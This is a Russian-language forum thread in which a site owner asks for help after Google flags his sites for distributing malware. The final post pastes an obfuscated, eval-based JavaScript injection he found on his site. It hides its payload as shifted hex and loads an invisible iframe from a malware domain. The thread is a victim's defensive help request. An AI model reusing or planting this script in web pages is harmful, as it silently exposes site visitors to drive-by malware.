# Форум на русском языке  > Лечение и защита сайтов от вирусов  >  Вирус на сайте

## Steel

Ребята, выручайте. Недавно завел домен king-sale.ru, сегодня им пользовался, было все норм. Пару часов назад стали ругаться браузеры, мол имеется инфа, что сайт атакует компьютеры и содержит вредоносное ПО.

Гугль говорит:

*Что произошло во время последнего посещения этого сайта компанией Google?*

На  2 из 2 страниц сайта, протестированных нами за последние 90 дней,  происходила загрузка и установка вредоносного ПО без согласия  пользователя. Последнее посещение этого сайта системой Google произошло  2013-04-21; последний раз подозрительный контент был обнаружен на этом  сайте 2013-04-21.Число доменов, на которых размещается вредоносное ПО: 1 (в том числе ivsykifa.ru/).

Сетей, в которых размещался этот сайт: 1 (в том числе AS48172 (OVERSUN)).

Проверял на http://2ip.ru, пишет: Подозрение на вирус! На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

На этом домене есть лендинг, с которого уже оплатил рекламу в паблике ВК на завтра и тут такая бяка...

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Info_bot

Уважаемый(ая) *Steel*, спасибо за обращение на наш форум! 

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

 Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

----------


## Дeнис

*Steel*, Чисто  :Wink:

----------

Steel

----------


## Steel

Оказывается, такая фигня случилась со всеми моими сайтами. Написал провайдеру, сказали, что проверили, вирусов нет, обращайтесь в ТП Гугла. Полазив в сети, так и не нашел этот "секретный адрес" техподдержки. 
Есть идеи?

----------


## Дeнис

*Steel*, Может кто то вас взломал? Или пров чудит? Какой смысл говорить что вирусы есть у него или дыры?

----------


## Steel

> *Steel*, Может кто то вас взломал? Или пров чудит? Какой смысл говорить что вирусы есть у него или дыры?


Скорее чудит гугл. Сейчас глянул, один из сайтов был выкинут из адвордса 16 часов назад по причине обнаружения вредоносного ПО.

----------


## Дeнис

*Steel*,  Тогда конечно гугль может  :Wink:

----------


## Steel

Если есть адрес ТП гугла, буду признателен.

----------


## Дeнис

Оно ? http://www.google.ru/contact/

----------

Steel

----------


## Steel

Не совсем, но все равно спасибо. Отправил через ТП адвордс. Сказали будут разбираться до трех дней.

- - - Добавлено - - -

На сайте был найден скрипт:


```
type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6b!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6b!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!70!7d!7a!80!72!70!6d!68!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6b!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6b!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6b!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6b!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6b!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6b!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6b!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6b!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6b!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6b!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);s="";if(window.document)for(i=0;i<z.length;i++){s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>
```

Можете помочь с его удалением?

----------

